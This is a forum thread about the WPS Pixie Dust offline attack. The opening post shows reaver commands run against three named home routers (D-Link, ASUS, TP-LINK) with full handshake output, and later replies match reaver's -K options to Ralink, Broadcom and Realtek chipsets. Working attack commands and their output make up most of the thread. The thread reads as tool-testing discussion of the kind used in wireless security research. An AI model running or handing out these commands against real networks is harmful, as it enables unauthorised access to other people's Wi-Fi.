Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #1
    Join Date
    2015-Apr
    Posts
    2
    Quote Originally Posted by t6_x View Post
    It would be interesting if you put the output of reaver.

    So we can see what the chipset is and other information

    I hope the following output of the tests of 3 routers is useful:

    root@kali64:~# reaver -i mon0 -b 5C9:98:33:xx:xx -vv -K 1

    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    mod by t6_x <[email protected]>
    mod by DataHead

    Option (-K 1) or (-K 2) must use the -S option. -S Option enabled now, continuing.
    [+] Waiting for beacon from 5C9:98:33:xx:xx
    [+] Switching mon0 to channel 1
    [+] Switching mon0 to channel 2
    [+] Associated with 5C9:98:33:xx:xx (ESSID: xxxxxxxxxxxx)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: fc:09:f4:f8:14:f7:d8:6a:e0:1f:45:af:39:c7:0f:ad
    [P] PKE: 85:84:7e:84:11:31:2e:77:e4:1b:da:ca:e5:be:c5:7f:1f :66:b5:e8:5f:21:f9:54:87:4f:49:ab:f4:bf:2d:93:e8:1 f:f3:92:de:d5:96:0f:98:25:e5:dd:74:d5:5a:ad:85:cc: 5a:f1:9d:c3:17:02:26:89:30:50:b4:e3:43:52:51:56:27 :7a:22:c2:a2:6d:ba:4c:c5:01:2d:ca:0c:21:ac:4c:94:1 2:27:aa:d1:3d:7c:49:bc:26:46:ac:c6:d6:e4:34:50:7c: 91:fd:25:fd:30:07:09:8d:88:5f:46:b8:ed:1e:99:70:42 :1b:29:31:7c:75:9c:56:4a:75:ee:3e:2d:0e:b1:45:e0:1 a:c7:e5:b4:e7:f8:88:bf:ae:87:2e:49:10:92:06:17:94: 49:c0:5d:4c:17:87:79:4c:c8:de:01:b0:0b:24:fb:2d:bd :4c:cb:80:99:7d:b4:d4:fa:af:38:8d:92:b2:77:ac:0d:6 9:9d:58:dc:a9:31:08:98:da
    [P] WPS Manufacturer: D-Link
    [P] WPS Model Number: DIR-615
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
    [P] AuthKey: 9a:86:3f:ff:71:8d:9d:e6:53:e3:a9:d7:e0:f8:95:cf:74 :0e:7e:88:32:67:c9:d1:87:2a:6b:e3:5a:17:88:4e
    [+] Sending M2 message
    [P] E-Hash1: 31:a7:13:e2:68:e4:4a:6f:af:c7:04:08:6e:5d:93:62:21 :b9:8e:a3:c3:31:47:d2:44:11:49:43:ef:ae:ac:c8
    [P] E-Hash2: 3c:60:ee:50:64:40:4a:16:52:73:3f:2c:34:9b:6c:7e:47 :71:9a:bc:71:b6:96:a1:3c:9b:c9:bc:14:ce:6d:76
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]


    root@kali64:~# reaver -i mon0 -b 40:16:7E:5D:xx:xx -vv -K 1

    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    mod by t6_x <[email protected]>
    mod by DataHead

    Option (-K 1) or (-K 2) must use the -S option. -S Option enabled now, continuing.
    [+] Waiting for beacon from 40:16:7E:5D:xx:xx
    [+] Switching mon0 to channel 1
    [+] Associated with 40:16:7E:5D:xx:xx (ESSID: xxxxxxxxxxxx)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: c3:b1:c2:3b:2a:5f:f3:35:83:c4:d2:68:16:64:d9:76
    [P] PKE: ae:90:dd:03:c2:b4:b0:7f:17:5d:c9:cf:3a:d8:6b:ca:1f :24:08:20:55:a8:73:65:6f:61:b7:a3:a8:2c:00:58:fb:d 0:3d:bc:35:a6:f6:10:fc:d2:c1:70:1c:9d:5f:af:d6:ed: 3f:ab:38:ff:86:9d:f7:84:6f:22:3b:cf:1e:9f:bf:cc:a1 :74:07:a1:69:7c:71:75:4e:cf:10:d6:34:d8:3a:b4:07:5 8:50:95:70:73:53:0e:c3:0f:de:34:7d:51:05:ad:74:82: 08:c6:04:ef:f9:42:a8:29:19:0c:68:64:63:ee:77:d8:50 :b6:fb:9e:7d:87:84:86:fe:78:6e:54:15:b6:32:3c:60:9 2:1c:aa:ce:49:a7:13:09:2b:ee:a8:4c:31:d3:09:b6:11: c4:16:32:c5:b9:9e:0d:65:89:96:f1:7f:37:2f:42:75:d2 :cf:50:b6:67:70:a7:1a:28:a8:d1:e8:4a:ec:a9:26:9f:b 7:c8:ea:78:9f:ad:e3:06:a8
    [P] WPS Manufacturer: ASUSTeK Computer Inc.
    [P] WPS Model Number: RT-N12
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
    [P] AuthKey: 8d:9c:e2:47:23:ac:b2:d1:f6:de:cd:d5:c1:d3:3f:41:13 :a4:e7:5c:20:3b:24:7c:f2:1a:4b:19:6f:ca:68:3b
    [+] Sending M2 message
    [P] E-Hash1: 6b:0f:9b:cd:c8:0e:92:78:13:6f:b8:01:f1:45:0c:3d:99 :88:60:1d:5d:69:6e:e6:55:da:44:a1:d9:61:1f:52
    [P] E-Hash2: 0c:16:eb:80:24:18:f5:1a:7d:c3:11:ba:c4:1c:e6:d6:56 :81:31:c3:76:6a:52:1c:4a:c6:5e:ad:0c:51:19:7b
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]



    root@kali64:~# reaver -i mon0 -b 64:70:02:5C:xx:xx -vv -K 1

    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    mod by t6_x <[email protected]>
    mod by DataHead

    Option (-K 1) or (-K 2) must use the -S option. -S Option enabled now, continuing.
    [?] Restore previous session for 64:70:02:5C:xx:xx? [n/Y] n

    [+] Associated with 64:70:02:5C:xx:xx (ESSID: xxxxxxxxxx)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: bf:1e:7d:b5:18:9e:f0:66:22:9c:5e:20:2e:43:31:6c
    [P] PKE: 9d:48:eb:a8:25:6e:6b:7d:aa:f5:b9:f2:da:49:66:b9:cd :8f:b1:ab:25:16:ba:7b:df:87:71:7e:d1:e8:af:b1:71:b a:c4:96:89:d8:db:1b:57:2c:61:cc:0e:a4:c6:31:02:38: 43:50:d1:be:b1:83:49:19:3e:8c:ed:9f:55:e5:6e:a7:1a :05:c5:5f:22:e0:c4:ac:d5:5d:d6:bd:32:a8:1d:e2:6f:2 5:78:e6:9a:4d:55:f1:7b:dd:ba:ed:13:7f:33:a6:76:38: af:c2:b5:d6:10:42:eb:98:4e:f6:fe:90:dd:4d:79:d6:08 :d7:3a:0c:86:11:4d:b5:75:76:d7:4c:48:a3:00:33:97:2 c:b5:57:a3:83:1a:5c:58:94:78:53:cf:58:54:c2:1f:fa: ec:91:06:84:d9:95:2a:38:31:72:a2:cc:17:63:a0:13:a0 :9e:7d:cf:cd:14:dd:07:82:76:2c:76:7d:2d:e2:fd:4a:d 9:a2:f4:b0:b1:fc:80:18:b1
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 1.0
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
    [P] AuthKey: 08:a0:73:06:7c:1c:bf:77:d9:04:a5:14:90:8f:b6:5d:4b :d7:f5:06:7a:8d:f4:e0:25:88:ae:70:07:d8:f4:82
    [+] Sending M2 message
    [P] E-Hash1: 2d:55:4e:4a:17:6a:87:ac:33:ae:e4:be:f8:3c:94:f0:d9 :ee:fd:5c:a6:a8:af:96:20:8a:07:e7:5d:cd:cd:35
    [P] E-Hash2: 11:f1:24:8c:37:54:fd:3c:5b:f3:b5:66:df:6a:58:e9:9c :f4:2c:9d:d5:ab:4e:36:89:bc:d8:27:9c:ac:15:7d
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]

  2. #2
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Just so you know, -K 1,2,3... Each number is for a different chipset. You have to look up which chipset the router uses and then use the corresponding -K 1,2,3 argument.

  3. #3
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by soxrok2212 View Post
    Just so you know, -K 1,2,3... Each number is for a different chipset. You have to look up which chipset the router uses and then use the corresponding -K 1,2,3 argument.
    Hello matey,

    Any idea what -K option should be used with what chipsets?

  4. #4
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by slim76 View Post
    Hello matey,

    Any idea what -K option should be used with what chipsets?
    Yeah, I just sent a message to t6_x, I think we will be removing those options to make it much simpler. I don't really understand it right now either but I guess I can try...

    Code:
    The -K option 1 runs pixiewps without PKR and the e-s1 = e-s2 = 0
    The -K option 2 runs pixiewps without PKR and the e-s1 = e-s2 = 0 but using the -n option of pixiewps (E-Nonce)
    The -K option 3 runs pixiewps with PKE, PKR and the hash1 = hash2 = e-nonce
    1 should be used with Ralink and -S used in reaver
    2 should be used with Broadcom and -S used in reaver
    3 is for Realtek and -S is NOT used in reaver (realtek isn't finished yet... it has worked for me but other users report failures)

  5. #5
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by soxrok2212 View Post
    Yeah, I just sent a message to t6_x, I think we will be removing those options to make it much simpler. I don't really understand it right now either but I guess I can try...

    Code:
    The -K option 1 runs pixiewps without PKR and the e-s1 = e-s2 = 0
    The -K option 2 runs pixiewps without PKR and the e-s1 = e-s2 = 0 but using the -n option of pixiewps (E-Nonce)
    The -K option 3 runs pixiewps with PKE, PKR and the hash1 = hash2 = e-nonce
    1 should be used with Ralink and -S used in reaver
    2 should be used with Broadcom and -S used in reaver
    3 is for Realtek and -S is NOT used in reaver (realtek isn't finished yet... it has worked for me but other users report failures)
    Cheers for the info matey, it's made things much clearer for me. :-)
    Cheers again for all your hard work, it's greatly appreciated.

  6. #6
    Join Date
    2016-Sep
    Posts
    8

    having the k 1,2,3 arguments explained like this in the menu would be helpful

    Quote Originally Posted by soxrok2212 View Post
    Just so you know, -K 1,2,3... Each number is for a different chipset. You have to look up which chipset the router uses and then use the corresponding -K 1,2,3 argument.
    I only started looking into all things wireless 2 weeks ago, and have been using -K 1 for all attacks because that is the only thing mentioned. If you put the number next to the chipset in the menu, that would be more intuitive for those who haven't read the full history of this post. I am going through it because I want to see the development from day dot to current, but most people I know don't want to do that amount of research before using tools.

    Awesome work, as a non-coder (hopefully I develop past script kiddie soon) I am in awe of you

    Apologies on posting halfway through reading the entire thread, I jumped the gun a bit.
    Last edited by vinneth; 2016-09-09 at 08:07. Reason: failed to read properly :-)
